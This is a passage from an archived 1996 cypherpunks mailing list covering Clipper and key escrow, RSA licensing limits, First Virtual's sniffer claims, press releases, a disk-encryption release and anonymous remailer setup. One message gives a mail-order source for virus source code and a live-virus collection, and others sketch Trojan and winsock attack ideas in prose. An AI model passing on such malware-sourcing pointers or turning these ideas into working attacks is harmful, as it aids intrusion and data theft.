>size of the crypto software we licensed from a third party. That crypto
>software also limited us to 760 bit RSA keys.

I find this very interesting. RSA prohibits its licencees from using RSA
software with truly secure keylenghts. What may have incenitvised them to
take this bizzare position?

<Can't wait until these damm patents expire>


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rschlafly@attmail.com (Roger  Schlafly)
Date: Wed, 31 Jan 1996 10:24:50 +0800
To: cypherpunks@toad.com
Subject: Clipper
Message-ID: <rschlafly0302322520>
MIME-Version: 1.0
Content-Type: text/plain



>> One of the interesting things about the whole crypto debate, going back at
>> least to the Clipper announcement (and actually some months before) has
>> been that the pro-restrictions, pro-GAK side of the argument has almost no
>> defenders! Except for David Sternlight, Dorothy Denning, and Donn Parker
>> ("attack of the killer Ds"?), there are almost no public spokesmen for the
>> pro-restriction, pro-GAK side.

>> There's quite a few folks in the Yale CS department that are pro-Clipper
>> or fence sitters.  They justify it in class by claiming that law
>> enforcement needs these abilities if LE is to remain effective. 

I don't think "pro-Clipper" properly characters the enemy.

Clipper is chip used in a voluntary federal standard.  If we had
sufficient civil liberties guarantees, I bet even a lot of
c'punks wouldn't object to govt agencies using clipper chips.

But the Freeh/Denning position, as I understand it, is that:

* privacy is not a right
* the govt should routinely spy on citizens
* strong crypto should be illegal
* no public debate on the underlying issues

Are there other computer scientists with this position?

Roger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@cybercash.com (Carl Ellison)
Date: Wed, 31 Jan 1996 08:55:27 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Denning's misleading statements
Message-ID: <v02120d0ead3421ea1cee@[204.254.34.231]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:49 1/27/96, Timothy C. May wrote:
>I've never met Dorothy Denning, so I hesitate to characterize her as a
>villainess. But certainly she's the only noted cryptographer I know of
>who's gone so far out on a limb to defend a position the vast majority of
>computer scientists, civil libertarians, and cryptographers scoff at.

I've met some others -- most noteably Silvio Micali [but he has a financial
interest in that position].  However, DERD is the only one I've met
who is all the way over on Freeh's side.

 - Carl


+--------------------------------------------------------------------------+
| Carl M. Ellison   cme@acm.org     http://www.clark.net/pub/cme           |
| PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 |
|   "Officer, officer, arrest that man!  He's whistling a dirty song."     |
+----------------------------------------------------------- Jean Ellison -+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 31 Jan 1996 10:50:27 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: The FV Problem = A Press Problem
In-Reply-To: <ad33b5f134021004e5fb@[205.199.118.202]>
Message-ID: <199601310005.QAA19840@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I agree with your points that the press should write real
articles, and not just swallow press releases. The fact of the matter
though, is that that's what they do, swallow press releases. It's a
said state of affairs, but that is the state of affairs.
	I wouldn't say *all* news is PR controlled, but most of it
is. It's much less work for the reporter when an article just shows up
on their desk and all they have to do is call one or two people for
some fresh quotes.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 31 Jan 1996 09:06:56 +0800
To: tbyfield@panix.com
Subject: Re: The FV Problem = A Press Problem
Message-ID: <199601302126.QAA16125@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by tbyfield@panix.com (t byfield) on Tue, 30 
Jan  3:49 PM

>        Chomsky took the phrase from a book by Walter 
>Lippman, published I  think in 1922; the book's name 
>escapes me now.


Would that be "Public Opinion?"


If so, that's an interesting progression: Bernays to Lippman to 
Chomsky: PR begets PO begets ...  How would the 
politico-linguist's advocacy be characterized, PR, PO or 
whatever is evolving parasitically from hegemonic, ever 
manipulative media?


All the variations of MCI-MS-News-Oracles, global combos and 
recombos burgeoning and emerging.


All the promising, braying, dreaming, lying, manipulating 
markets and investors reminds of Lippman's and Bernay's and 
Chomsky's warnings about evil-doers causing the sky to fall.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 31 Jan 1996 11:42:21 +0800
To: Pete Loshin <pete@loshin.com>
Subject: Re: No FV supporters?
In-Reply-To: <01BAEF34.AA95ECC0@ploshin.tiac.net>
Message-ID: <310EB8B2.23B@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Pete Loshin wrote:
> Now, clearly there are lots of opinions on FV's system, but
> if people like Sameer and Rich Salz (e.g., who have reputations
> as knowledgeable and aware) are going to trash FV it
> would mean a lot more to many readers if they could state
> more specifically what it is about FV that doesn't work (or that
> doesn't work as well as, say, SSL or CyberCash or Open
> Market's approaches).

  I sent a description of an attack against FV based on replacing
or hacking winsock to cypherpunks last night.  This attack seems
to meet Borenstein's criteria of being as automated and implementable
on a mass scale as their keyboard snooping attack.  So far I have not
seen any response from FV.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 31 Jan 1996 23:31:20 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Lotus Notes
In-Reply-To: <v02120d06ad344e1513d5@[192.0.2.1]>
Message-ID: <310EB96A.933@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
> 
> At 11:09 1/30/96, Charlie_Kaufman/Iris.IRIS@iris.com wrote:
> 
> >p.s. re: the fact that it's 64 bits rather than 128. That was the limit on key
> >size of the crypto software we licensed from a third party. That crypto
> >software also limited us to 760 bit RSA keys.
> 
> I find this very interesting. RSA prohibits its licencees from using RSA
> software with truly secure keylenghts. What may have incenitvised them to
> take this bizzare position?

  I don't want to defend RSA, their code, or their licensing practices,
but I don't know of any such restrictions in BSAFE.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Wed, 31 Jan 1996 09:13:00 +0800
To: "'ota+@transarc.com>
Subject: RE: No FV supporters?
Message-ID: <01BAEF34.AA95ECC0@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Nathaniel seems to be defending his cause sufficiently well, 
and graciously answering the abuse.  Some of the abusers 
are showing a fairly comprehensive lack of knowledge of the 
FV system.

I would venture to say that FV has no more profit motivation
than, say, Netscape--or how about Open Market?  They who
gleefully opened a "Here are the secure servers that haven't 
been hacked" page some time ago.  That was pretty self-
serving, wasn't it?

Nor would I consider the FV brouhaha much more obvious
than, say, the front page announcements about "NFS and 
RPC considered dangerous" that hit the big papers last year.
The weaknesses of those protocols for internetworking have
long been known to those working with TCP/IP.

Now, clearly there are lots of opinions on FV's system, but
if people like Sameer and Rich Salz (e.g., who have reputations
as knowledgeable and aware) are going to trash FV it
would mean a lot more to many readers if they could state
more specifically what it is about FV that doesn't work (or that
doesn't work as well as, say, SSL or CyberCash or Open 
Market's approaches).

As for the Weld Pond/et al graphical clicking approaches,
they may work and they may defend against some attacks, 
but I won't use it (too much clicking around, too likely to 
make mistakes) and neither will anyone without a GUI.

My $0.02.

-Pete Loshin
 pete@loshin.com

Ted Anderson wrote:

>I am rather shocked that after wading through hundreds of msgs of abuse
>of Nathaniel and FV I haven't seen one message of support; but perhaps I
>missed it.

etc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 31 Jan 1996 23:30:00 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: No FV supporters?
In-Reply-To: <310EB8B2.23B@netscape.com>
Message-ID: <199601310119.RAA29332@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


>   I sent a description of an attack against FV based on replacing
> or hacking winsock to cypherpunks last night.  This attack seems
> to meet Borenstein's criteria of being as automated and implementable
> on a mass scale as their keyboard snooping attack.  So far I have not
> seen any response from FV.

	Would someone like to implement such a thing? That would be
"the cypherpunk way" of properly debunking FV's claims. I wonder if
Simson would put you on the cover of the SJ Merc for doing it..

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lyalc@ozemail.com.au (lyal collins)
Date: Wed, 31 Jan 1996 16:39:56 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Java Sniffer (Was: Re: FV Announces That The Sky Is Falling)
Message-ID: <199601300631.RAA28225@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain



>Much more likely, IMHO, than a Java sniffer is a Java Trojan horse that pops 
>up an innocuous dialog box and asks you to enter some sensitive piece of
>information, then sends it off somewhere. About all it takes to write that is
>a modicum of skill in user interface design. You could write it in any 
>programming language, but in Java it may be particularly effective, since 
>people may come to expect to be prompted for sensitive info over the net by 
>Java apps. Maybe the Java folks who just left Sun decided to seize the
>opportunity ;>
>
>Futplex <futplex@pseudonym.com>
>
A very realistic scenario - any comments or reasons it can't happen ??
second question:
How can you be sure you receive the applet that you "think" you've requested ?

Any illuminating comments to assit my awareness of java ?
lyal





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 31 Jan 1996 10:37:30 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: [NOISE] Re: [FACTS] Germany, or "Oh no not again"
In-Reply-To: <Pine.ULT.3.91.960129210801.6235c-100000@Networking.Stanford.EDU>
Message-ID: <9601302336.AA14776@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Brian Davis writes:
 > > > m5@dev.tivoli.com (Mike McNally) writes:
 > > > 
 > > > ... for immoral purposes?
 > > 
 > > ... white wimmin ...
 > 
 > On the contrary ...

Not that I don't wish I could take credit for a discussion thread of
such high caliber as this, but I can't; I have no idea how my name got
glued on there.

______c_____________________________________________________________________
Mike M Nally * Tivoli Systems * Austin TX   * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 31 Jan 1996 12:19:29 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re: Lotus Notes
Message-ID: <v02120d07ad3473b8d31f@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:19 1/30/96, Rich Salz wrote:
>>I find this very interesting. RSA prohibits its licencees from using RSA
>>software with truly secure keylenghts.
>
>Hunh?  I could find no mention of keylength or keysize in the RSAREF
>documents I had around.  I'm at home now, but I also recall no mention
>of keysize or keylength in the license OSF has, either.

So from who did Lotus license RC4?


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 31 Jan 1996 12:09:14 +0800
To: Laszlo Vecsey <cypherpunks@toad.com
Subject: Re: KOH "Helpful" Crypto Virus
Message-ID: <v02120d09ad34770c9b3f@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 13:20 1/30/96, Laszlo Vecsey wrote:
>I'm looking for more information on the KOH Virus, a 'helpful' virus which
>kindly asks to infect your system and encrypt all of your data. It spreads
>to floppies (upon request) and to other systems, encrypting all files.
[...]
>Please point me towards the source/binary, or further information.

You can get the binary, full source, and manual on disk for $32 plus $3 for
S&H from
American Eagle Publications
POB 1507
Show Low, AZ 85901
(800) 719-4957
(520) 367-1621

While you are at it, you might also want to pick up their famous collection
CD-ROM full of virus code, live viruses, virus creation engines, etc. From
their catalog: "For starters, you get a fantastic virus collection
consisting of 574 families [...] about 3700 carefully tested and cataloged
viruses in all...$99 + $5 S&H.

A must have :-)


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wprice@primenet.com (Will Price)
Date: Wed, 31 Jan 1996 22:42:46 +0800
To: cypherpunks@toad.com
Subject: ANNOUNCE: CryptDisk 1.2 for Macintosh
Message-ID: <v02130500ad3470a2ddcf@[206.16.90.10]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I'm pleased to announce that version 1.2 of CryptDisk for Macintosh is now
available.

The Winner of MacUser's 1995 Shareware Award for Personal Tools, CryptDisk
is a soft partition encryptor for the Macintosh.  It lets you create
"files" of any size which can be mounted as if they were hard drives on
your desktop.  These files are encrypted/decrypted on the fly using the
IDEA encryption algorithm.  IDEA is an internationally known algorithm that
uses 128-bit keys.  Most cryptographers consider it significantly superior
to the government's DES standard.  CryptDisk makes data security a seamless
integrated component of your desktop allowing you instant access to huge
numbers of encrypted files including the ability to play QuickTime movies
directly from CryptDisks.

IMPROVEMENTS IN 1.2:

* CryptDisks can now be used on read-only volumes allowing CryptDisks to be
mounted from CD-ROMs.  Locking a CryptDisk in the Finder will also mount it
as a read only volume.

* New interface for specifying disk sizes allows arbitrarily sized disks
from 64K on up.  CryptDisks can now be sized to take up all the space on a
floppy disk.

* CryptDisk now dynamically informs the user for each volume how much
contiguous space is available to create a CryptDisk before specifying the
passphrase.

* The public distribution now contains native PowerPC code for the
application itself.  Previously, only the driver was native in the public
release.

* A serious security hole was plugged that should affect only a very small
number of users.  Please follow the release notes to make sure you are not
affected and to take appropriate steps if you are.

* CryptDisk is now much more robust about mounting disks and will inform
the user of the nature of any problems it has mounting disks.

Information on obtaining the latest version is available to US and Canadian
citizens from:

ftp://ftp.primenet.com/users/w/wprice/README

or by visiting the web page:

http://www.primenet.com/~wprice/cdisk.html

You may also be able to obtain it from other export controlled FTP sites
around the US as it gets distributed.

CryptDisk is shareware for $20.  The source code is also available for an
extra $20.  Registered users receive access to beta versions of CryptDisk
and are sent announcements about its status periodically.

All CryptDisk release are signed by my public key:

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBvAy8TO8gAAAEDAM4+RCTIFa3XIH67EgwsQa2pOE/1++pn4Kd7J9qiKmMRMfEp
PU4bIvLhhMUltHgHcDYOlTbKJuf1mQ33PAHuSB8dp4bDJP5CE0yzCxm7tBbwcZIo
6uTlB9BNtgY6eimbWQARAQABtCBXaWxsIFByaWNlIDx3cHJpY2VAcHJpbWVuZXQu
Y29tPokAlQMFEC/FQHtleYS4x6lm3QEBKbED/39GQWceDT8j5ClnsM9/A7fOC4I8
cf50N/Tb2gYpHsNUhZDq+FlWShytyTN0AFPPusogBwS9Ee9YeY97jaM5K0i7Kl2k
CUmrR/QxMO0gZrZLEyYb5mIu0qJ7OuZEvsxACd01HptUfbf+yomH9qlebHJQaBmW
hUiqm3D9n2vnP4Cz
=plkF
- -----END PGP PUBLIC KEY BLOCK-----

- -Will
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMQ7FcU22Bjp6KZtZAQGRHwL/ZeVQ5dDmIrjd1AD25T4rPDizXpF50KoC
uHvMSgRIE9Md5azfvLDADWF6ro0QlZ7WeeYRNTiEHBPDaGcrc49pOmJ6b79SWS3I
YreAd9krnNSON4KSwqv9xnwPxVPDZkSL
=8H43
-----END PGP SIGNATURE-----

_______________________________________________________
| Will Price   | wprice@primenet.com                   |
|  ________    | http://www.primenet.com/~wprice       |
|  \      /    | PGP key available by finger.          |
|   \    /     |                                       |
|____\  /______|_______________________________________|
      \/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 31 Jan 1996 09:59:26 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: [NOISE] Re: [FACTS] Germany, or "Oh no not again"
In-Reply-To: <Pine.ULT.3.91.960129210801.6235c-100000@Networking.Stanford.EDU>
Message-ID: <Pine.BSF.3.91.960130181414.26435K-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 29 Jan 1996, Rich Graves wrote:

> On Mon, 29 Jan 1996, Dr. Dimitri Vulis wrote:
> 
> > m5@dev.tivoli.com (Mike McNally) writes:
> > 
> > Isn't there something in U.S. Code about crossing state lines
> > for immoral purposes?
> 
> Yeah -- the intent was to stop the undesirables from kidnapping the pure 
> white wimmin. Hasn't been used for years, if not decades.

On the contrary, the Mann Act is still used occasionally to prosecute 
those who kidnap women and transport them over state lines, usually to be 
used in prostitution rings.  I've never prosecuted one, though.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nag.cs.colorado.edu>
Date: Wed, 31 Jan 1996 12:09:44 +0800
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: I gave FV the idea for the keyboard sniffer
In-Reply-To: <Ql3UHiOMc50e5Ir1sa@nsb.fv.com>
Message-ID: <199601310135.SAA28397@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity claiming to be Nathaniel Borenstein <nsb@nsb.fv.com> 
 is alleged to have written:
>
> I have not yet heard anything that makes me think that my 
> claim is untrue.  We have revealed the first known strategy 
> for an Internet-based large-scale automated attack on the 
> credit card system.  I think that's a real threat.


I know that you are being swamped by hate mail from cypherpunks,
so I'll try to keep my comments brief.  First, I commend you for
forging ahead with research and business as you see fit, despite
the regular barrages of venomous condemnation that you are 
subjected to.  "I think that's a real threat", too.  I believe 
that you have valuable insights into Internet commerce security 
which the typical cypherpunk lacks, and I'm glad that you are 
"getting the word out" both to the cpunks and to larger 
communities.


(Having said that, and having decided to Cc: this message to
cpunks and e$, I shall elaborate:)


The ideas that you espouse that the typical cpunk lacks fall
into two broad categories which have something in common.
First, the overwhelming importance of user interface and dealing
with technically clueless users.  Second, the importance of
evaluating risks from a cost/benefit perspective, and trusting
in a system once it is "secure enough".  


What these ideas have in common is simply that they are 
*practical*.  And that's important.  If First Virtual uses
simple techniques which are crackable, but so unprofitable to 
crack that no-one will ever do so, and if First Virtual uses 
this technique and allows everyday users to do transactions over 
the Internet, then that is a net.commerce success story.  
Furthermore, it's a *cryptographic* success story.


Much more so than "CYpherPunk Agent X" who writes a black-market
implementation of Chaumian electronic cash which no-one will 
ever use.  He has accomplished little more than entertaining and 
educating himself.  This is the cypherpunk fallacy which is
enshrined in the Manifesto when it says "code can never be
destroyed".  Yes it can.  Or it can be ignored which has the 
same effect.  The important thing is when code and users meet.


(Of course, I still think First Virtual is marketing an ugly
klooge that doesn't stand a chance against better technologies
in the next couple of years, but I digress...)


But despite all of the above, Nathaniel, I must protest your
claim to have "revealed" the "first known strategy".  That
strategy has been common knowledge since probably before you
were born.  In fact just a couple of weeks ago *I* posted
articles to cypherpunks and the "ecash" list saying that 
I thought the most viable attack on DigiCash Ecash would be a
virus/Trojan horse which attacked the computer on the user's
end.


Did you read these articles of mine?  Is it possible that that
is where you got the idea for your experiment?


As an aside you recently said that you didn't see any reason to
PGP-sign list traffic.  Here is a good example of its
usefulness:  I can prove that I authored the aforementioned
messages, and when.  (Also it has already been more or less 
proven to people who use PGP on their cpunks traffic that the 
author of the aforementioned messages was also the author of 
hundreds of other messages including this one both in cpunks 
and in other forums over the last six months.)


Now I didn't mention in my articles that such an attack would be
as viable (more so, actually) against a credit card scheme as it
would against Ecash, for two reasons 1:  It was already common
knowledge, and 2:  I consider credit card schemes to be hopeless
anachronisms that will soon be eliminated in the evolutionary
race of modern currency.


Anyway, keep up the good work, and consider the merits of being
a little more circumspect in your press releases.


Regards,

Bryce

P.S.  Okay I admit that the Subject: line was a little bit
inflammatory.  If I had named my message "Re: FV demonstrates
fatal flaw" then nobody would have read it...


                 "Toys, Tools and Technologies"
  the Niche 
        New Signal Consulting -- C++, Java, HTML, Ecash
            Bryce 
 
PGP sig follows



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMQ7HVPWZSllhfG25AQGBQQQAin5OYD+yq+1FXlYEocJHrTm3muPmaIRs
tYRMxv5JckjqplAImJZywFDxrKqWTojGC6c290nTFCHly/YfZ6ziBpuKEN+ULF4y
Gf9EKrYABkm2I7yn4sUU0Bhw/GTQj7CXnmaSH3G/zDGCYZFnQHB6AaptYOsKwE+m
5No3AqyULa8=
=/v0Q
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 31 Jan 1996 10:53:01 +0800
To: Alex Strasheim <cypherpunks@toad.com
Subject: Re: RC2 code on sci.crypt
In-Reply-To: <199601300531.XAA10444@proust.suba.com>
Message-ID: <9601302358.AA29563@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



At a W3C security meeting we were discussing encryption algs to use, not 
suprisingly RC4 came up, Ron suggested that we also include `aledged-rc4'.
Maybe we need aledged-rc2 as well :-)

Then again I thing we might end up with "alledged HTTP" and similar products 
from a number of vendors if we went too far down that route.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: prmoyer@magpage.com (Philip R. Moyer)
Date: Wed, 31 Jan 1996 10:47:14 +0800
Subject: No Subject
Message-ID: <199601310018.TAA12796@alaska.magpage.com>
MIME-Version: 1.0
Content-Type: text


Well, I'm discouraged.  I'm looking for strongly encrypted cellular telephones,
but I can't seem to find many.  If you know of some, could you pass along some
pointers for me?  I would really like to avoid using a GAK enabled product,
if there's any way to avoid it (even if it means paying lots of extra $$$).

Cheers,
Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 31 Jan 1996 23:31:06 +0800
To: shamrock@netcom.com
Subject: Re: Lotus Notes
Message-ID: <9601310019.AA18345@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>I find this very interesting. RSA prohibits its licencees from using RSA
>software with truly secure keylenghts.

Hunh?  I could find no mention of keylength or keysize in the RSAREF
documents I had around.  I'm at home now, but I also recall no mention
of keysize or keylength in the license OSF has, either.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 31 Jan 1996 22:36:03 +0800
To: Laszlo Vecsey <master@internexus.net>
Subject: Re: KOH "Helpful" Crypto Virus
Message-ID: <v02120d0bad348e2f09ea@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:29 1/30/96, Laszlo Vecsey wrote:
>> While you are at it, you might also want to pick up their famous collection
>> CD-ROM full of virus code, live viruses, virus creation engines, etc. From
>> their catalog: "For starters, you get a fantastic virus collection
>> consisting of 574 families [...] about 3700 carefully tested and cataloged
>> viruses in all...$99 + $5 S&H.
>>
>
>I take it its completely legal to set up a Virus ftp site then?

AFIK, in the US it is legal to set up a virus ftp site. I don't know if
someone has actually done it. Don't count on it lasting. Some European
countries have already outlawed virus (read knowledge) distribution.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Wed, 31 Jan 1996 11:23:04 +0800
To: cypherpunks@toad.com
Subject: Re: The FV Problem = A Press Problem
Message-ID: <ad341eb60302100439eb@[132.162.233.188]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:28 PM 01/30/96, Timothy C. May wrote:
>At 6:42 PM 1/30/96, Jonathan Rochkind wrote:
[...]
>>that allowed Bernays to do his thing.  Bernays developed expertise in
>>"engineering of consent" turned the news into a commercialized and
>
>Interesting term, similar to Chomsky's "Manufacturing Consent" (which
>obviously must've come later...).

Chomsky generally takes those terms like that from the (often truly scary)
writings of others. "Manufacturing Consent", "Deterring Democracy," etc.  I
bet Bernays said 'manufacturing consent' at some point too, and this is
where Chomsky got it.

> [...]
>Maybe I've from the old school, the school that says one should be more
>modest, objective, and circumspect. Then, if it's really news, and not just
>a PR scam, the journalists will come.

One _should_ be, but the question is whether that's the way the media
actually works.   Now, clearly, with thousands of journalists all doing
their own thing, no one model of the media is going to be all encompassing.
Journalists all believe they are looking for real news, of course--but when
it's so much (much, much) easier (and, equally importantly, less
time-consuming) to get leads from press releases then from investigation...
the key, of course, is for the press releases to convince the journalist
that what they're talking about _is_ real news, and not just hype.

I'm sure Garfinkel thinks that the FV story is "real news", and is grateful
for the "alert" alerting him to it.  Although,  Borenstein says that the
Garfinkel article came first in this case--but he probably just means
before the FV 'alert', not before FV 'demonstrated' the issue with a
program of their own, which was probably Garfinkel's lead.

>I think that the view that "all news is hype" is overly harsh. In fact,
>corrective forces tend to slow this headlong rush into P.R. For example,
>the reaction here to the Nathaniel Borenstein/First Virtual hyperbole, and
>the fatuous, credulous article by Simson Garfinkel (sorry, Simson, but I
>call 'em as I see 'em), will undermine their credibility for a long time.
>Crying wolf, and all that.

It will undermine their credibility among cypherpunks for a long time,
certainly.  Maybe even among the net--but among the vast majority of the
public?  It's possible that as "among the net" grows to include
increasingly more of the 'the public',  things will change.  But at
present, I don't think things will have changed yet.  The FV propaganda
will probably net good results for FV,  although not among cypherpunks.

>The FV "discovery" that insecure machines can cause all sorts of problems
>rated at most a brief paragraph in the papers, not the full-page treatment
>Garfinkel and his editors gave it in the "San Jose Mercury News" (and maybe
>other papers that picked it up, or will in the next few weeks).
>
>Newspapers and magazines that run "fluff" pieces, taken almost directly
>from press releases, lose credibility.
>[...]

Most people aren't equipped with the knowledge to tell that this was a
'fluff' piece, not meriting a full page story.  In fact,  most people rely
on newspapers themselves to make these sorts of determinations for
them--what topics are seriously important and newsworthy, and what topics
aren't.  Which is why companies can be so succesful when they can use press
releases to influences what shows up in the news.   Generally, press
releases aren't seen by the majority of the public, so they don't realize
that a story is taken directly from a press release.  Most papers use
press releases to write stories--maybe not the NYT, but most local papers.
And most people either don't realize it, or don't care.

>>If you want to effect what's in the media, maybe you should learn how to
>>issue press releases.
>
>Nope. I think it a very poor model for getting information out. With all
>due respect to Sameer, who has done many fine things, I gag every time I
>see a press release from Community Connection in which Sameer interviews
>himself.
>

It's a poor model in the sense that it makes us cringe with their tackiness
and phoniness, you're right.  But the question is whether it _works_, and I
suggest it does.  The tacky and phony press releases get just enough
editing from journalists to appear to be 'real' articles (although if one
practices... I think I can spot the articles in the paper written more or
less directly from P.R. with reasonable accuracy. )  The fact that there
are lots of people payed a lot to do "public relations" is evidence of
this,  I think,  as this is pretty much what 'public relations' is.

As tacky and phony as press releases are, I'm glad Sameer writes them,
because it's the way to get your issues (and often opinions) covered by the
press.  It's the way you play the system, unless the system changes.  Maybe
the system will change because of the Net--I hope so.  But, as the net
becomes huger and huger, most people will still have to pay others to
filter out the good information for them (only the truly diehard can still
read most usenet groups--or cypherpunks for that matter.)  And odds are,
it's newspaper-like organizations we'll be paying (many current newspapers
are revisioning themselves in just such a role).  And, as you identified in
your first post, it's in the interests of both newspapers and commercial
interests to continue the P.R. relationship.   Whether it's in the
intersets of the consuming public (or more importantly, I think, the
polity--Bernays wasn't talking about what you buy at the supermarket when
he discussed the engineering of consent) is more debatable.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 31 Jan 1996 11:19:21 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Reply Blocks and Nyms: newbie question
In-Reply-To: <310e8f92.2746553@mail.aracnet.com>
Message-ID: <199601310048.TAA25897@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bruce Baugh writes:
> I'm almost certainly going to be changing my address in the next few
> weeks. I'd like to keep the same nym account. Can someone take a stab
> at explaining how to feed the relevant info to C2?

I'm very interested in figuring out how to refine the user instructions for
Matt's pseudonymizer at alpha, and similar anonymity/pseudonymity systems.

Let me quote what I think are the relevant parts of Matt's standard
instructions, without further comment from me for now. Please point out
anywhere you see a gap or something confusing so we can figure out how to
improve the instructions.

(I'm quoting from the Oct.1, 1995 version at 
http://www.cs.berkeley.edu/~raph/alpha-help.html --- mailto:help@alpha.c2.org
for the current version)

<QUOTE>
To create a mail alias, first create an encrypted reply-block for a
cypherpunk-style remailer.  An encrypted reply block is a message
encrypted with a remailer's PGP public key, which will be sent to
your address, or to an address where you can receive messages.

To create a reply block, you would create a message for a remailer that
goes back to you:

 ::
 Request-Remailing-To: you@yoursite.org

Then you would encrypt that with a remailer's public key, and prepend
the necessary Encrypted: PGP header.  When this message is received by
a remailer, it would decrypt it and send it to you.  It would also send
you any text appended to the end (outside the PGP wrapper).  Thus, using
a reply block, it is possible for people to send you mail without knowing
your real address.

Next, choose a pseudonym and a password.  The pseudonym-address may contain
any alphabetical or numeric characters, or hyphens.  The password may not
contain any spaces.  Then create a message of the following format:

 From: yourname@alpha.c2.org
 Password: Your_Password
 Reply-Block:
 ::
 Anon-To: remailer@utopia.hacktic.nl
 
 ::
 Encrypted: PGP
 
 -----BEGIN PGP MESSAGE-----
 Version: 2.3a
 
